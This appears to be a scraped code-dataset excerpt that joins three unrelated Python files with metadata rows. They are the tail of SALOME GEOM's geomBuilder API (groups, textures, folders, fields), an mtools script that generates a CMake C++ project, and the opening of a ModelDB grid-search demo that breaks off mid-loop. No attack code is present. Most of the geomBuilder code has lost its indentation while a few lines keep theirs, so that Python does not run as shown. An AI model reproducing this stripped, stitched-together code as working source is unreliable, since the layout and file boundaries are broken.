# New group is created. It will contain only entities
# which are present in groups listed in theGList1 but
# are not present in groups from theGList2.
# @param theGList1 is a list of GEOM groups to include elements of.
# @param theGList2 is a list of GEOM groups to exclude elements of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_cut_groups_anchor "Example"
@ManageTransactions("GroupOp")
def CutListOfGroups (self, theGList1, theGList2, theName=None):
"""
Cut of lists of groups.
New group is created. It will contain only entities
which are present in groups listed in theGList1 but
are not present in groups from theGList2.
Parameters:
theGList1 is a list of GEOM groups to include elements of.
theGList2 is a list of GEOM groups to exclude elements of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.CutListOfGroups(theGList1, theGList2)
RaiseIfFailed("CutListOfGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
        ## Returns a list of IDs of sub-objects stored in the group
# @param theGroup is a GEOM group for which a list of IDs is requested
#
# @ref swig_GetObjectIDs "Example"
@ManageTransactions("GroupOp")
def GetObjectIDs(self,theGroup):
"""
            Returns a list of IDs of sub-objects stored in the group
Parameters:
theGroup is a GEOM group for which a list of IDs is requested
"""
# Example: see GEOM_TestOthers.py
ListIDs = self.GroupOp.GetObjects(theGroup)
RaiseIfFailed("GetObjects", self.GroupOp)
return ListIDs
## Returns a type of sub-objects stored in the group
# @param theGroup is a GEOM group which type is returned.
#
# @ref swig_GetType "Example"
@ManageTransactions("GroupOp")
def GetType(self,theGroup):
"""
Returns a type of sub-objects stored in the group
Parameters:
theGroup is a GEOM group which type is returned.
"""
# Example: see GEOM_TestOthers.py
aType = self.GroupOp.GetType(theGroup)
RaiseIfFailed("GetType", self.GroupOp)
return aType
## Convert a type of geom object from id to string value
        #  @param theId is a GEOM object type id.
# @return type of geom object (POINT, VECTOR, PLANE, LINE, TORUS, ... )
# @ref swig_GetType "Example"
def ShapeIdToType(self, theId):
"""
Convert a type of geom object from id to string value
Parameters:
                theId is a GEOM object type id.
Returns:
type of geom object (POINT, VECTOR, PLANE, LINE, TORUS, ... )
"""
if theId == 0:
return "COPY"
if theId == 1:
return "IMPORT"
if theId == 2:
return "POINT"
if theId == 3:
return "VECTOR"
if theId == 4:
return "PLANE"
if theId == 5:
return "LINE"
if theId == 6:
return "TORUS"
if theId == 7:
return "BOX"
if theId == 8:
return "CYLINDER"
if theId == 9:
return "CONE"
if theId == 10:
return "SPHERE"
if theId == 11:
return "PRISM"
if theId == 12:
return "REVOLUTION"
if theId == 13:
return "BOOLEAN"
if theId == 14:
return "PARTITION"
if theId == 15:
return "POLYLINE"
if theId == 16:
return "CIRCLE"
if theId == 17:
return "SPLINE"
if theId == 18:
return "ELLIPSE"
if theId == 19:
return "CIRC_ARC"
if theId == 20:
return "FILLET"
if theId == 21:
return "CHAMFER"
if theId == 22:
return "EDGE"
if theId == 23:
return "WIRE"
if theId == 24:
return "FACE"
if theId == 25:
return "SHELL"
if theId == 26:
return "SOLID"
if theId == 27:
return "COMPOUND"
if theId == 28:
return "SUBSHAPE"
if theId == 29:
return "PIPE"
if theId == 30:
return "ARCHIMEDE"
if theId == 31:
return "FILLING"
if theId == 32:
return "EXPLODE"
if theId == 33:
return "GLUED"
if theId == 34:
return "SKETCHER"
if theId == 35:
return "CDG"
if theId == 36:
return "FREE_BOUNDS"
if theId == 37:
return "GROUP"
if theId == 38:
return "BLOCK"
if theId == 39:
return "MARKER"
if theId == 40:
return "THRUSECTIONS"
if theId == 41:
return "COMPOUNDFILTER"
if theId == 42:
return "SHAPES_ON_SHAPE"
if theId == 43:
return "ELLIPSE_ARC"
if theId == 44:
return "3DSKETCHER"
if theId == 45:
return "FILLET_2D"
if theId == 46:
return "FILLET_1D"
if theId == 201:
return "PIPETSHAPE"
return "Shape Id not exist."
## Returns a main shape associated with the group
# @param theGroup is a GEOM group for which a main shape object is requested
# @return a GEOM object which is a main shape for theGroup
#
# @ref swig_GetMainShape "Example"
@ManageTransactions("GroupOp")
def GetMainShape(self,theGroup):
"""
Returns a main shape associated with the group
Parameters:
theGroup is a GEOM group for which a main shape object is requested
Returns:
a GEOM object which is a main shape for theGroup
Example of usage: BoxCopy = geompy.GetMainShape(CreateGroup)
"""
# Example: see GEOM_TestOthers.py
anObj = self.GroupOp.GetMainShape(theGroup)
RaiseIfFailed("GetMainShape", self.GroupOp)
return anObj
## Create group of edges of theShape, whose length is in range [min_length, max_length].
# If include_min/max == 0, edges with length == min/max_length will not be included in result.
# @param theShape given shape (see GEOM.GEOM_Object)
# @param min_length minimum length of edges of theShape
# @param max_length maximum length of edges of theShape
# @param include_max indicating if edges with length == max_length should be included in result, 1-yes, 0-no (default=1)
# @param include_min indicating if edges with length == min_length should be included in result, 1-yes, 0-no (default=1)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group of edges
#
        #  @ref swig_todo "Example"
def GetEdgesByLength (self, theShape, min_length, max_length, include_min = 1, include_max = 1, theName=None):
"""
Create group of edges of theShape, whose length is in range [min_length, max_length].
If include_min/max == 0, edges with length == min/max_length will not be included in result.
Parameters:
theShape given shape
min_length minimum length of edges of theShape
max_length maximum length of edges of theShape
include_max indicating if edges with length == max_length should be included in result, 1-yes, 0-no (default=1)
include_min indicating if edges with length == min_length should be included in result, 1-yes, 0-no (default=1)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group of edges.
"""
edges = self.SubShapeAll(theShape, self.ShapeType["EDGE"])
            edges_in_range = []
            for edge in edges:
                Props = self.BasicProperties(edge)
                if min_length <= Props[0] and Props[0] <= max_length:
                    if (not include_min) and (min_length == Props[0]):
                        continue
                    if (not include_max) and (Props[0] == max_length):
                        continue
                    edges_in_range.append(edge)
if len(edges_in_range) <= 0:
print "No edges found by given criteria"
return None
# note: auto-publishing is done in self.CreateGroup()
group_edges = self.CreateGroup(theShape, self.ShapeType["EDGE"], theName)
self.UnionList(group_edges, edges_in_range)
return group_edges
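        # A hedged usage sketch (illustrative bounds): group the edges of 'Box'
        # strictly shorter than 10, excluding the upper bound itself:
        #   ShortEdges = geompy.GetEdgesByLength(Box, 0., 10., include_max=0)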
## Create group of edges of selected shape, whose length is in range [min_length, max_length].
# If include_min/max == 0, edges with length == min/max_length will not be included in result.
# @param min_length minimum length of edges of selected shape
# @param max_length maximum length of edges of selected shape
# @param include_max indicating if edges with length == max_length should be included in result, 1-yes, 0-no (default=1)
# @param include_min indicating if edges with length == min_length should be included in result, 1-yes, 0-no (default=1)
# @return a newly created GEOM group of edges
# @ref swig_todo "Example"
def SelectEdges (self, min_length, max_length, include_min = 1, include_max = 1):
"""
Create group of edges of selected shape, whose length is in range [min_length, max_length].
If include_min/max == 0, edges with length == min/max_length will not be included in result.
Parameters:
min_length minimum length of edges of selected shape
max_length maximum length of edges of selected shape
include_max indicating if edges with length == max_length should be included in result, 1-yes, 0-no (default=1)
include_min indicating if edges with length == min_length should be included in result, 1-yes, 0-no (default=1)
Returns:
a newly created GEOM group of edges.
"""
nb_selected = sg.SelectedCount()
if nb_selected < 1:
print "Select a shape before calling this function, please."
return 0
if nb_selected > 1:
print "Only one shape must be selected"
return 0
id_shape = sg.getSelected(0)
shape = IDToObject( id_shape )
group_edges = self.GetEdgesByLength(shape, min_length, max_length, include_min, include_max)
left_str = " < "
right_str = " < "
if include_min: left_str = " <= "
if include_max: right_str = " <= "
self.addToStudyInFather(shape, group_edges, "Group of edges with " + `min_length`
+ left_str + "length" + right_str + `max_length`)
sg.updateObjBrowser(1)
return group_edges
# end of l3_groups
## @}
#@@ insert new functions before this line @@ do not remove this line @@#
## Create a copy of the given object
#
# @param theOriginal geometry object for copy
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM_Object, containing the copied shape.
#
# @ingroup l1_geomBuilder_auxiliary
# @ref swig_MakeCopy "Example"
@ManageTransactions("InsertOp")
def MakeCopy(self, theOriginal, theName=None):
"""
Create a copy of the given object
Parameters:
theOriginal geometry object for copy
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing the copied shape.
Example of usage: Copy = geompy.MakeCopy(Box)
"""
# Example: see GEOM_TestAll.py
anObj = self.InsertOp.MakeCopy(theOriginal)
RaiseIfFailed("MakeCopy", self.InsertOp)
self._autoPublish(anObj, theName, "copy")
return anObj
## Add Path to load python scripts from
# @param Path a path to load python scripts from
# @ingroup l1_geomBuilder_auxiliary
def addPath(self,Path):
"""
Add Path to load python scripts from
Parameters:
Path a path to load python scripts from
"""
if (sys.path.count(Path) < 1):
sys.path.append(Path)
pass
pass
## Load marker texture from the file
# @param Path a path to the texture file
# @return unique texture identifier
# @ingroup l1_geomBuilder_auxiliary
@ManageTransactions("InsertOp")
def LoadTexture(self, Path):
"""
Load marker texture from the file
Parameters:
Path a path to the texture file
Returns:
unique texture identifier
"""
# Example: see GEOM_TestAll.py
ID = self.InsertOp.LoadTexture(Path)
RaiseIfFailed("LoadTexture", self.InsertOp)
return ID
## Get internal name of the object based on its study entry
        #  @note This method does not provide a unique identifier of the geometry object.
# @note This is internal function of GEOM component, though it can be used outside it for
# appropriate reason (e.g. for identification of geometry object).
# @param obj geometry object
        #  @return object identifier (not guaranteed to be unique)
# @ingroup l1_geomBuilder_auxiliary
def getObjectID(self, obj):
"""
Get internal name of the object based on its study entry.
            Note: this method does not provide a unique identifier of the geometry object.
It is an internal function of GEOM component, though it can be used outside GEOM for
appropriate reason (e.g. for identification of geometry object).
Parameters:
obj geometry object
Returns:
                object identifier (not guaranteed to be unique)
"""
ID = ""
entry = salome.ObjectToID(obj)
if entry is not None:
lst = entry.split(":")
if len(lst) > 0:
ID = lst[-1] # -1 means last item in the list
return "GEOM_" + ID
return ID
## Add marker texture. @a Width and @a Height parameters
# specify width and height of the texture in pixels.
# If @a RowData is @c True, @a Texture parameter should represent texture data
# packed into the byte array. If @a RowData is @c False (default), @a Texture
# parameter should be unpacked string, in which '1' symbols represent opaque
# pixels and '0' represent transparent pixels of the texture bitmap.
#
# @param Width texture width in pixels
# @param Height texture height in pixels
# @param Texture texture data
# @param RowData if @c True, @a Texture data are packed in the byte stream
# @return unique texture identifier
# @ingroup l1_geomBuilder_auxiliary
@ManageTransactions("InsertOp")
def AddTexture(self, Width, Height, Texture, RowData=False):
"""
Add marker texture. Width and Height parameters
specify width and height of the texture in pixels.
If RowData is True, Texture parameter should represent texture data
packed into the byte array. If RowData is False (default), Texture
parameter should be unpacked string, in which '1' symbols represent opaque
pixels and '0' represent transparent pixels of the texture bitmap.
Parameters:
Width texture width in pixels
Height texture height in pixels
Texture texture data
RowData if True, Texture data are packed in the byte stream
Returns:
return unique texture identifier
"""
if not RowData: Texture = PackData(Texture)
ID = self.InsertOp.AddTexture(Width, Height, Texture)
RaiseIfFailed("AddTexture", self.InsertOp)
return ID
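        # A hedged usage sketch (illustrative): an 8x8 checker texture passed as
        # an unpacked '0'/'1' string, with RowData left at its default False:
        #   row1 = "11110000"
        #   row2 = "00001111"
        #   ID = geompy.AddTexture(8, 8, (row1 + row2) * 4)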
## Creates a new folder object. It is a container for any GEOM objects.
# @param Name name of the container
# @param Father parent object. If None,
# folder under 'Geometry' root object will be created.
        #  @return a newly created folder
# @ingroup l1_publish_data
def NewFolder(self, Name, Father=None):
"""
Create a new folder object. It is an auxiliary container for any GEOM objects.
Parameters:
Name name of the container
Father parent object. If None,
folder under 'Geometry' root object will be created.
Returns:
                a newly created folder
"""
if not Father: Father = self.father
return self.CreateFolder(Name, Father)
## Move object to the specified folder
# @param Object object to move
# @param Folder target folder
# @ingroup l1_publish_data
def PutToFolder(self, Object, Folder):
"""
Move object to the specified folder
Parameters:
Object object to move
Folder target folder
"""
self.MoveToFolder(Object, Folder)
pass
## Move list of objects to the specified folder
# @param ListOfSO list of objects to move
# @param Folder target folder
# @ingroup l1_publish_data
def PutListToFolder(self, ListOfSO, Folder):
"""
Move list of objects to the specified folder
Parameters:
ListOfSO list of objects to move
Folder target folder
"""
self.MoveListToFolder(ListOfSO, Folder)
pass
## @addtogroup l2_field
## @{
## Creates a field
# @param shape the shape the field lies on
# @param name the field name
# @param type type of field data: 0 - bool, 1 - int, 2 - double, 3 - string
# @param dimension dimension of the shape the field lies on
# 0 - VERTEX, 1 - EDGE, 2 - FACE, 3 - SOLID, -1 - whole shape
# @param componentNames names of components
# @return a created field
@ManageTransactions("FieldOp")
def CreateField(self, shape, name, type, dimension, componentNames):
"""
Creates a field
Parameters:
shape the shape the field lies on
name the field name
                type type of field data: 0 - bool, 1 - int, 2 - double, 3 - string
dimension dimension of the shape the field lies on
0 - VERTEX, 1 - EDGE, 2 - FACE, 3 - SOLID, -1 - whole shape
componentNames names of components
Returns:
a created field
"""
if isinstance( type, int ):
if type < 0 or type > 3:
raise RuntimeError, "CreateField : Error: data type must be within [0-3] range"
type = [GEOM.FDT_Bool,GEOM.FDT_Int,GEOM.FDT_Double,GEOM.FDT_String][type]
f = self.FieldOp.CreateField( shape, name, type, dimension, componentNames)
RaiseIfFailed("CreateField", self.FieldOp)
global geom
geom._autoPublish( f, "", name)
return f
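        # A hedged usage sketch (illustrative): a double-valued field with two
        # components on the vertices of 'Box' (type 2 - double, dimension 0 - VERTEX):
        #   f = geompy.CreateField(Box, "displacement", 2, 0, ["dX", "dY"])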
## Removes a field from the GEOM component
# @param field the field to remove
def RemoveField(self, field):
"Removes a field from the GEOM component"
global geom
if isinstance( field, GEOM._objref_GEOM_Field ):
geom.RemoveObject( field )
elif isinstance( field, geomField ):
geom.RemoveObject( field.field )
else:
raise RuntimeError, "RemoveField() : the object is not a field"
return
## Returns number of fields on a shape
@ManageTransactions("FieldOp")
def CountFields(self, shape):
"Returns number of fields on a shape"
nb = self.FieldOp.CountFields( shape )
RaiseIfFailed("CountFields", self.FieldOp)
return nb
## Returns all fields on a shape
@ManageTransactions("FieldOp")
def GetFields(self, shape):
"Returns all fields on a shape"
ff = self.FieldOp.GetFields( shape )
RaiseIfFailed("GetFields", self.FieldOp)
return ff
## Returns a field on a shape by its name
@ManageTransactions("FieldOp")
def GetField(self, shape, name):
"Returns a field on a shape by its name"
f = self.FieldOp.GetField( shape, name )
RaiseIfFailed("GetField", self.FieldOp)
return f
# end of l2_field
## @}
import omniORB
# Register the new proxy for GEOM_Gen
omniORB.registerObjref(GEOM._objref_GEOM_Gen._NP_RepositoryId, geomBuilder)
## Field on Geometry
# @ingroup l2_field
class geomField( GEOM._objref_GEOM_Field ):
def __init__(self):
GEOM._objref_GEOM_Field.__init__(self)
self.field = GEOM._objref_GEOM_Field
return
## Returns the shape the field lies on
def getShape(self):
"Returns the shape the field lies on"
return self.field.GetShape(self)
## Returns the field name
def getName(self):
"Returns the field name"
return self.field.GetName(self)
## Returns type of field data as integer [0-3]
def getType(self):
"Returns type of field data"
return self.field.GetDataType(self)._v
## Returns type of field data:
# one of GEOM.FDT_Bool, GEOM.FDT_Int, GEOM.FDT_Double, GEOM.FDT_String
def getTypeEnum(self):
"Returns type of field data"
return self.field.GetDataType(self)
## Returns dimension of the shape the field lies on:
# 0 - VERTEX, 1 - EDGE, 2 - FACE, 3 - SOLID, -1 - whole shape
def getDimension(self):
"""Returns dimension of the shape the field lies on:
0 - VERTEX, 1 - EDGE, 2 - FACE, 3 - SOLID, -1 - whole shape"""
return self.field.GetDimension(self)
## Returns names of components
def getComponents(self):
"Returns names of components"
return self.field.GetComponents(self)
## Adds a time step to the field
# @param step the time step number further used as the step identifier
# @param stamp the time step time
# @param values the values of the time step
def addStep(self, step, stamp, values):
"Adds a time step to the field"
stp = self.field.AddStep( self, step, stamp )
if not stp:
raise RuntimeError, \
"Field.addStep() : Error: step %s already exists in this field"%step
global geom
geom._autoPublish( stp, "", "Step %s, %s"%(step,stamp))
self.setValues( step, values )
return stp
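    # A hedged usage sketch (illustrative; 'f' as returned by CreateField, the
    # value list length being number-of-sub-shapes times number-of-components):
    #   step = f.addStep(1, 0.0, [0.0] * (8 * 2))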
## Remove a time step from the field
def removeStep(self,step):
"Remove a time step from the field"
stepSO = None
try:
stepObj = self.field.GetStep( self, step )
if stepObj:
stepSO = geom.myStudy.FindObjectID( stepObj.GetStudyEntry() )
except:
#import traceback
#traceback.print_exc()
pass
self.field.RemoveStep( self, step )
if stepSO:
geom.myBuilder.RemoveObjectWithChildren( stepSO )
return
## Returns number of time steps in the field
def countSteps(self):
"Returns number of time steps in the field"
return self.field.CountSteps(self)
## Returns a list of time step IDs in the field
def getSteps(self):
"Returns a list of time step IDs in the field"
return self.field.GetSteps(self)
## Returns a time step by its ID
def getStep(self,step):
"Returns a time step by its ID"
stp = self.field.GetStep(self, step)
if not stp:
raise RuntimeError, "Step %s is missing from this field"%step
return stp
## Returns the time of the field step
def getStamp(self,step):
"Returns the time of the field step"
return self.getStep(step).GetStamp()
## Changes the time of the field step
def setStamp(self, step, stamp):
"Changes the time of the field step"
return self.getStep(step).SetStamp(stamp)
## Returns values of the field step
def getValues(self, step):
"Returns values of the field step"
return self.getStep(step).GetValues()
## Changes values of the field step
def setValues(self, step, values):
"Changes values of the field step"
stp = self.getStep(step)
errBeg = "Field.setValues(values) : Error: "
try:
ok = stp.SetValues( values )
except Exception, e:
excStr = str(e)
if excStr.find("WrongPythonType") > 0:
raise RuntimeError, errBeg +\
"wrong type of values, %s values are expected"%str(self.getTypeEnum())[4:]
raise RuntimeError, errBeg + str(e)
if not ok:
nbOK = self.field.GetArraySize(self)
nbKO = len(values)
if nbOK != nbKO:
raise RuntimeError, errBeg + "len(values) must be %s but not %s"%(nbOK,nbKO)
else:
raise RuntimeError, errBeg + "failed"
return
pass # end of class geomField
# Register the new proxy for GEOM_Field
omniORB.registerObjref(GEOM._objref_GEOM_Field._NP_RepositoryId, geomField)
## Create a new geomBuilder instance. The geomBuilder class provides the Python
# interface to GEOM operations.
#
# Typical use is:
# \code
# import salome
# salome.salome_init()
# from salome.geom import geomBuilder
# geompy = geomBuilder.New(salome.myStudy)
# \endcode
# @param study SALOME study, generally obtained by salome.myStudy.
# @param instance CORBA proxy of GEOM Engine. If None, the default Engine is used.
# @return geomBuilder instance
def New( study, instance=None):
"""
    Create a new geomBuilder instance. The geomBuilder class provides the Python
interface to GEOM operations.
Typical use is:
import salome
salome.salome_init()
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
Parameters:
study SALOME study, generally obtained by salome.myStudy.
instance CORBA proxy of GEOM Engine. If None, the default Engine is used.
Returns:
geomBuilder instance
"""
#print "New geomBuilder ", study, instance
global engine
global geom
global doLcc
engine = instance
if engine is None:
doLcc = True
geom = geomBuilder()
assert isinstance(geom,geomBuilder), "Geom engine class is %s but should be geomBuilder.geomBuilder. Import geomBuilder before creating the instance."%geom.__class__
geom.init_geom(study)
return geom
# Register methods from the plug-ins in the geomBuilder class
plugins_var = os.environ.get( "GEOM_PluginsList" )
plugins = None
if plugins_var is not None:
plugins = plugins_var.split( ":" )
plugins=filter(lambda x: len(x)>0, plugins)
if plugins is not None:
for pluginName in plugins:
pluginBuilderName = pluginName + "Builder"
try:
exec( "from salome.%s.%s import *" % (pluginName, pluginBuilderName))
except Exception, e:
from salome_utils import verbose
print "Exception while loading %s: %s" % ( pluginBuilderName, e )
continue
exec( "from salome.%s import %s" % (pluginName, pluginBuilderName))
plugin = eval( pluginBuilderName )
# add methods from plugin module to the geomBuilder class
for k in dir( plugin ):
if k[0] == '_': continue
method = getattr( plugin, k )
if type( method ).__name__ == 'function':
if not hasattr( geomBuilder, k ):
setattr( geomBuilder, k, method )
pass
pass
del pluginName
pass
pass
| lgpl-2.1 | -8,497,507,476,621,121,000 | 48.652687 | 169 | 0.597899 | false |
vindar/mtools | tools/mtools-project.py | 1 | 8519 | #!/usr/bin/env python
#
# Copyright 2015 Arvind Singh
# This file is part of the mtools library.
#
# mtools is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with mtools If not, see <http://www.gnu.org/licenses/>.
############################################################################
# #
# script: create an empty mtools project. #
# #
############################################################################
################### main.cpp ####################
mainFile = r"""/***********************************************
* project: [PROJECT_NAME_PLH]
* date: [PROJECT_DATE_PLH]
***********************************************/
#include "mtools/mtools.hpp"
int main(int argc, char *argv[])
{
MTOOLS_SWAP_THREADS(argc,argv); // required on OSX, does nothing on Linux/Windows
mtools::parseCommandLine(argc,argv,true); // parse the command line, interactive mode
mtools::cout << "Hello World\n";
mtools::cout.getKey();
return 0;
}
/* end of file main.cpp */
"""
################### CMakeLists.txt ####################
cmakeFile = r"""################################################
# CMakeLists for project: [PROJECT_NAME_PLH]
# date: [PROJECT_DATE_PLH]
#
# generated by mtools-project.py
################################################
cmake_minimum_required(VERSION 3.10.1)
if( WIN32 )
# look for vcpkg on windows
if (DEFINED ENV{VCPKG_DIR})
string(REPLACE "\\" "/" _vcpkg_dir "$ENV{VCPKG_DIR}")
else ()
find_file( _vcpkg_exe "vcpkg.exe" PATHS ENV PATH)
if (_vcpkg_exe)
get_filename_component(_vcpkg_dir ${_vcpkg_exe} DIRECTORY)
endif()
endif()
if (_vcpkg_dir)
set(CMAKE_TOOLCHAIN_FILE "${_vcpkg_dir}/scripts/buildsystems/vcpkg.cmake")
message(STATUS "Windows: vcpkg found at [${_vcpkg_dir}]")
else()
message(STATUS "Windows: vcpkg not found.")
endif()
# only Debug and Release configurations
SET(CMAKE_CONFIGURATION_TYPES "Debug;Release;RelWithDebInfo" CACHE STRING "" FORCE)
endif()
# use the same compilers as that used for compiling mtools
set(CMAKE_CXX_COMPILER "${MTOOLS_CXX_COMPILER}" CACHE STRING "" FORCE)
set(CMAKE_C_COMPILER "${MTOOLS_C_COMPILER}" CACHE STRING "" FORCE)
project([PROJECT_NAME_PLH])
# release is the default build type
if (NOT CMAKE_BUILD_TYPE)
set(CMAKE_BUILD_TYPE Release)
endif ()
# add the project main directory as a possible location for findXXX.cmake scripts.
set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${PROJECT_SOURCE_DIR})
find_package(mtools REQUIRED)
######### external dependencies #########
# (look also for FindXXX.cmake in the project dir.)
# for exemple
# find_package(GUROBI REQUIRED)
#########################################
file(GLOB project_SRC "*.cpp" "*.hpp" "*.h")
add_executable("${PROJECT_NAME}" ${project_SRC})
target_link_libraries("${PROJECT_NAME}" PUBLIC mtools)
# compile options
if(WIN32)
set(CMAKE_CXX_STANDARD 17)
set(CMAKE_CXX_STANDARD_REQUIRED ON)
set(CMAKE_CXX_EXTENSIONS OFF)
set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} /DMTOOLS_DEBUG_FLAG")
# hack for RelWithDebINfo configuration otherwise compile never ends on MSVC
set(CMAKE_CXX_FLAGS_RELWITHDEBINFO "/Zi /Gm- /Ox /Ob0 /DMTOOLS_DEBUG_FLAG")
else()
target_compile_options("${PROJECT_NAME}" PUBLIC "-std=c++17")
set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} -DMTOOLS_DEBUG_FLAG -Wall")
set(CMAKE_CXX_FLAGS_RELWITHDEBINFO "${CMAKE_CXX_FLAGS_RELWITHDEBINFO} -DMTOOLS_DEBUG_FLAG -Wall")
set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -Wall")
endif()
######### external dependencies #########
# add here other dependencies such as:
# find_package(GSL)
# target_link_libraries("${PROJECT_NAME}" PUBLIC GSL::gsl)
#########################################
# set the project as the default startup project in visual studio.
set_property(DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR} PROPERTY VS_STARTUP_PROJECT "${PROJECT_NAME}")
# move CMake specific project inside filter "CMakePredefinedTargets".
set_property(GLOBAL PROPERTY USE_FOLDERS ON)
set(PREDEFINED_TARGETS_FOLDER "CustomTargets")
message(STATUS "")
message(STATUS "")
if (NOT WIN32)
message(STATUS "Project ${PROJECT_NAME} created for make with configuration ${CMAKE_BUILD_TYPE}")
message(STATUS " - Debug : [${CMAKE_CXX_FLAGS_DEBUG}]")
message(STATUS " - RelWithDebInfo : [${CMAKE_CXX_FLAGS_RELWITHDEBINFO}]")
message(STATUS " - Release : [${CMAKE_CXX_FLAGS_RELEASE}]")
else()
message(STATUS "Project ${PROJECT_NAME} created for MSVC with configurations")
message(STATUS " - Debug : [${CMAKE_CXX_FLAGS_DEBUG}]")
message(STATUS " - RelWithDebInfo : [${CMAKE_CXX_FLAGS_RELWITHDEBINFO}]")
message(STATUS " - Release : [${CMAKE_CXX_FLAGS_RELEASE}]")
endif()
message(STATUS "")
message(STATUS "")
#end of file
"""
################### clean_build.py ####################
cleanbuildFile = r"""#!/usr/bin/env python
#
# project: [PROJECT_NAME_PLH]
# date: [PROJECT_DATE_PLH]
# script that cleans the /build sub-directory
#
import shutil
import os
#import time
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
if os.path.isdir("build"):
shutil.rmtree('build')
# time.sleep(1)
os.makedirs('build')
with open('build/build_directory','w') as out:
out.write('This directory (will) contain the CMake generated project files.')
"""
################### run_cmake.py ####################
runcmakeFile = r"""#!/usr/bin/env python
#
# project: [PROJECT_NAME_PLH]
# date: [PROJECT_DATE_PLH]
# Invoque cmake to build the project.
# usage: ./run_cmake [CMAKE_OPTIONS...]
#
import sys
import os
import subprocess
carg = sys.argv
del carg[0]
carg.insert(0, 'cmake')
carg.append('..')
# on windows, we build x64 binaries
if sys.platform.startswith('win32'):
    carg.insert(1, '-A')
    carg.insert(2, 'x64')
# invoque cmake with the correct arguments
if not os.path.exists('build'):
os.makedirs('build')
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname + "/build")
subprocess.call(carg)
"""
############################################################################
# the python script
import os
import shutil
import sys
import datetime
import subprocess
# Python 2 and 3:
from builtins import input
myinput = input
# display an error msg
def error(msg):
print("*** ERROR ***")
print(msg)
    myinput("Press Enter to continue...")
sys.exit(0)
# make replacement in string then save the file
def repl(text, filename):
    text = text.replace("[PROJECT_NAME_PLH]", project_name)
    text = text.replace("[PROJECT_DATE_PLH]", project_date)
    filepath = project_dir + "/" + filename
    try:
        with open(filepath, "w") as fout:
            fout.write(text)
    except Exception:
        error("cannot write file [" + filepath + "]")
# get the date
project_date = str(datetime.date.today())
# get the project name
if len(sys.argv) > 1:
project_name = sys.argv[1]
else:
project_name = myinput("Name of the project to create ? ")
# create the project directory
project_dir = os.getcwd() + "/" + project_name
project_build = project_dir + "/build"
if os.path.exists(project_dir):
error("directory [" + project_dir + "] already exist")
try:
os.makedirs(project_dir)
except:
error("cannot create project directory [" + project_dir + "]")
# copy the files
repl(mainFile,"main.cpp")
repl(cmakeFile,"CMakeLists.txt")
repl(runcmakeFile,"run_cmake.py")
repl(cleanbuildFile,"clean_build.py")
os.chdir(project_dir)
os.system("python clean_build.py")
# uncomment below to run cmake right way.
#os.system("python run_cmake.py")
print("\n*** Project " + project_name + " created ! ***")
if sys.platform.startswith('win32'):
myinput("Press Enter to continue...")
# end of script mtools-project.py
############################################################################
| gpl-3.0 | -2,650,942,873,968,966,000 | 25.538941 | 98 | 0.620965 | false |
mitdbg/modeldb | client/workflows/examples-without-verta/scripts/client-demo.py | 1 | 3496 | """Logistic Regression with Grid Search (scikit-learn)"""
import os, sys
import itertools
import joblib
import pandas as pd
import numpy as np
from sklearn import model_selection
from sklearn import linear_model
from sklearn import metrics
sys.path.append(os.path.join("..", "modeldb"))
from modeldbclient import ModelDBClient
import warnings
warnings.filterwarnings('ignore')
# Logging Workflow
# instantiate client
client = ModelDBClient()
proj = client.set_project("Test Project")
expt = client.set_experiment("Test Experiment")
# load pre-cleaned data from CSV file into pandas DataFrame
data_path = os.path.join("..", "data", "census", "cleaned-census-data.csv")
df = pd.read_csv(data_path, delimiter=',')
# split into features and labels
features_df = df.drop('>50K', axis='columns')
labels_df = df['>50K'] # we are predicting whether an individual's income exceeds $50k/yr
# extract NumPy arrays from DataFrames
X = features_df.values
y = labels_df.values
# split data into training, validation, and testing sets
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.20, shuffle=False)
X_train, X_val, y_train, y_val = model_selection.train_test_split(X_train, y_train, test_size=0.20, shuffle=False)
# define hyperparameters
hyperparam_candidates = {
'C': [1e-1, 1, 1e1],
'solver': ['lbfgs'],
'max_iter': [1e3, 1e4, 1e5],
}
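# enumerate every combination of hyperparameter values (the full search grid)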
hyperparam_sets = [dict(zip(hyperparam_candidates.keys(), values))
for values
in itertools.product(*hyperparam_candidates.values())]
# grid search through hyperparameters
for hyperparam_num, hyperparams in enumerate(hyperparam_sets):
# create object to track experiment run
run = client.set_experiment_run(f"run {hyperparam_num}")
# log hyperparameters
for key, val in hyperparams.items():
run.log_hyperparameter(key, val)
print(hyperparams, end=' ')
# log data
run.log_dataset("data", data_path)
# create and train model
model = linear_model.LogisticRegression(**hyperparams)
model.fit(X_train, y_train)
# calculate and log validation accuracy
val_acc = model.score(X_val, y_val)
run.log_metric("validation accuracy", val_acc)
print(f"Validation accuracy: {val_acc}")
# save and log model
